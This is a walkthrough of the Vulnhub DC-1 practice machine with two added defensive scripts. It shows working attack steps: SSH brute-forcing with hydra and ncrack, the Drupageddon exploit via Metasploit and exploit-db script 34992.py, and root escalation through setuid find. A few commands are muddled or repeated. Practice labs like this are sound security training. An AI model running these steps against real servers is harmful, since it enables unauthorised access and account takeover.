
Want to practice the skills needed to build practical ethical hacking experience? Then read on. The exercise is to use Kali Linux against a test virtual machine for one purpose: to go from an unprivileged user to root. More than that, the goal is not to take the easy way out. Resisting the natural urge to reach for Metasploit is a habit worth starting, which is why I document both routes, with Metasploit and without, in this walkthrough. This is the DC-1 Vulnhub Kali Linux walkthrough.

Want to set up a home pentesting lab to practice your ethical hacking skills? I spell out how it’s done in the 10 easy steps post.

The DC-1 Vulnhub image is a 32-bit Debian system with the Drupal CMS installed and running. With five flags to capture and read there is plenty to do with this one. Afterwards I went back and kept reasoning about other ways the image could be exploited.

There are five flags in total, but the ultimate goal is to find and read the flag in root’s home directory. You don’t even need to log in as root to do this; you will, however, need root privileges.

vulnhub.com

Here’s What You Need

The first step is to list the running services on the DC-1 vulnerable box. For this I use a variety of tools: nmap, netdiscover and nbtscan.

root@kali:~# nmap -sV 10.0.2.6

Brute-forcing the Running Services

Kali Linux already has tools installed to brute-force services on targets, among them hydra and ncrack.

root@kali:~# hydra -l root -P /usr/share/wordlists/rockyou.txt 10.0.2.6 ssh
root@kali:~# ncrack -p 22 --user root -P /usr/share/wordlists/rockyou.txt 10.0.2.6

One of the most useful nmap scans to run is a service-version scan.

msf > db_nmap -sV -Pn 10.0.2.6

Using Netcat

netcat can act as both a TCP server and a TCP client. With -z it only reports whether a port is open without sending any data, and with no port list it complains, as shown here, so give it a port or a range.

msf5 > nc -z 10.0.2.6
[*] exec: nc -z 10.0.2.6

no port[s] to connect to

msf5 > nc -nv 10.0.2.6

Using Metasploit to Hack DC-1

The right setup can save a lot of time later on, so I make it a habit to follow these steps every time I launch msfconsole. Performing a db_nmap scan means I can use the hosts and services commands later to list formatted tables of the data gathered so far.

# FOLLOW THESE DIRECTIONS!

# start the database server
root@kali:~# service postgresql start

root@kali:~# msfdb init

root@kali:~# msfconsole

# create workspace. -a for "add"
msf > workspace -a dc01
msf > workspace dc01

The exploit I am using is drupageddon.

100644/rw-r--r-- 52 fil 2019-02-19 08:45:11 -0500 flag1.txt

# go to the mysql service location
cd /var/www/includes/database

# open a shell from meterpreter
meterpreter > shell

Next I look for files on the server that are owned by root and carry the setuid bit. First, though, I use Python’s pty module to upgrade to a proper interactive bash shell. Technically the pty module’s spawn method starts a named process and attaches the parent process to the new one’s standard input and output. Here I run the Python code inline using the -c flag; in this syntax multiple statements are separated by a semicolon.

meterpreter > shell
Process 5291 created.
Channel 11 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@DC-1:/var/www/$ 

Look for setuid binaries owned by root, in the hope that one of them can be used to run commands as root.

find / -user root -perm -4000
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find

Because /usr/bin/find is setuid root, its -exec action runs /bin/sh with root’s effective user id, which gives a root shell.

www-data@DC-1:/var/www$ find . -exec '/bin/sh' \;

There you have the final flag text file, found in the root user’s home directory.
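A defender’s counterpart to this enumeration, added here as an example and not part of the original walkthrough: the script takes the find output above, compares it against a hypothetical stock-Debian baseline of setuid-root binaries (my assumption, not something the page lists), and reports the two entries that stand out, /usr/bin/find and /usr/bin/procmail, together with the chmod that strips the bit.

```python
from typing import Dict, List

# Hypothetical baseline (an assumption): setuid-root binaries a stock Debian install
# is expected to carry. Anything outside it deserves a look; on DC-1 that is find and procmail.
BASELINE = {
    "/bin/mount", "/bin/umount", "/bin/su", "/bin/ping", "/bin/ping6",
    "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/newgrp",
    "/usr/bin/gpasswd",
}

# Constructed input: the `find / -user root -perm -4000` output shown above,
# with the shell prompt left in the way a captured session usually has it.
FIND_OUTPUT = """\
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
www-data@DC-1:/var/www$
"""

def parse_find_output(text: str) -> List[str]:
    """Keep only absolute paths; drop prompts, blank lines and other noise."""
    return [ln.strip() for ln in text.splitlines() if ln.strip().startswith("/")]

def audit_suid(paths: List[str], baseline=BASELINE) -> Dict[str, List[str]]:
    """Split the setuid-root list into entries the baseline expects and ones it does not."""
    present = set(paths)
    return {
        "unexpected": sorted(present - baseline),  # privilege-escalation candidates
        "missing": sorted(baseline - present),     # a different problem, but worth noting
    }

def remediation(path: str) -> str:
    """The fix for an unexpected entry is to strip the setuid bit (or remove the package)."""
    return f"chmod u-s {path}"

if __name__ == "__main__":
    for p in audit_suid(parse_find_output(FIND_OUTPUT))["unexpected"]:
        print(f"UNEXPECTED setuid-root binary: {p}  -> {remediation(p)}")
```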

MySQL Database Hacking

Now that we have a bash shell on the server, let’s revisit the database access gained earlier.

mysql -u dbuser -p drupaldb
Enter password: R0ck3t

mysql> show databases;

mysql> use drupaldb;

mysql> show tables;

mysql> select * from users;
# Passwords everywhere!

mysql> exit;

I cracked the password hash found in /etc/shadow for the user flag4. The password is orange!

SSH Access Using Cracked Password

Using the password I cracked for the flag4 user, I make a simple SSH login to the DC-1 server.

Using hydra again, only this time cutting the computing time down drastically by supplying the correct username.

root@kali:~# hydra -l root -P /usr/share/wordlists/rockyou.txt 10.0.2.6 ssh

Or by using ncrack.

root@kali:~# ncrack -p 22 --user root -P /usr/share/wordlists/rockyou.txt 10.0.2.6
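The server side of the hydra and ncrack runs shown here and in the brute-forcing section earlier, as an added example that is not from the walkthrough: it scans constructed sshd auth.log lines, counts failed passwords per source address, and flags a guessing source that later gets an Accepted login, which is what a cracked flag4 password followed by an SSH login looks like from the DC-1 side. The log lines, the source addresses and the threshold of five are my own constructions.

```python
import re
from collections import Counter, defaultdict

# Constructed sample of sshd auth.log lines: a hydra-style burst against root from
# one source, then a successful flag4 login from that same source (the page's scenario).
AUTH_LOG = """\
Feb 19 08:40:01 DC-1 sshd[1201]: Failed password for root from 10.0.2.5 port 40110 ssh2
Feb 19 08:40:01 DC-1 sshd[1202]: Failed password for root from 10.0.2.5 port 40111 ssh2
Feb 19 08:40:02 DC-1 sshd[1203]: Failed password for root from 10.0.2.5 port 40112 ssh2
Feb 19 08:40:02 DC-1 sshd[1204]: Failed password for root from 10.0.2.5 port 40113 ssh2
Feb 19 08:40:03 DC-1 sshd[1205]: Failed password for root from 10.0.2.5 port 40114 ssh2
Feb 19 08:40:03 DC-1 sshd[1206]: Failed password for invalid user admin from 10.0.2.5 port 40115 ssh2
Feb 19 08:41:10 DC-1 sshd[1250]: Accepted password for flag4 from 10.0.2.5 port 40200 ssh2
Feb 19 08:45:00 DC-1 sshd[1301]: Failed password for flag4 from 10.0.2.9 port 50001 ssh2
"""

FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED = re.compile(r"Accepted password for (\S+) from (\S+) port")

def analyze(log_text, threshold=5):
    """Count failed logins per source; flag sources at or over the threshold and
    any accepted login that came from one of those sources."""
    failures = Counter()         # source ip -> number of failed attempts
    targeted = defaultdict(set)  # source ip -> user names it guessed against
    accepted = []                # (user, source ip) for successful logins
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            user, ip = m.groups()
            failures[ip] += 1
            targeted[ip].add(user)
            continue
        m = ACCEPTED.search(line)
        if m:
            accepted.append(m.groups())
    brute_sources = {ip for ip, n in failures.items() if n >= threshold}
    # Highest-priority finding: a guessing source that eventually got in.
    suspicious = [(u, ip) for u, ip in accepted if ip in brute_sources]
    return {
        "failures": dict(failures),
        "targeted": {ip: sorted(users) for ip, users in targeted.items()},
        "brute_sources": brute_sources,
        "suspicious_logins": suspicious,
    }

if __name__ == "__main__":
    for user, ip in analyze(AUTH_LOG)["suspicious_logins"]:
        print(f"ALERT: {ip} brute-forced sshd and then logged in as {user}")
```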

Not Using Metasploit

Learn a new command: searchsploit! The exploits are stored in /usr/share/exploitdb and consist of PHP, Ruby, Python and other scripts.


The exploit scripts shipped with Kali Linux work just as well against the same vulnerable Drupal server without Metasploit.

msf5 > python /usr/share/exploitdb/exploits/php/webapps/34992.py -t 10.0.2.6 -u hacker -p pass

[!] VULNERABLE!

[!] Administrator user created!

[*] Login: hacker
[*] Pass: pass
[*] Url: http://10.0.2.6/?q=node&destination=node
error: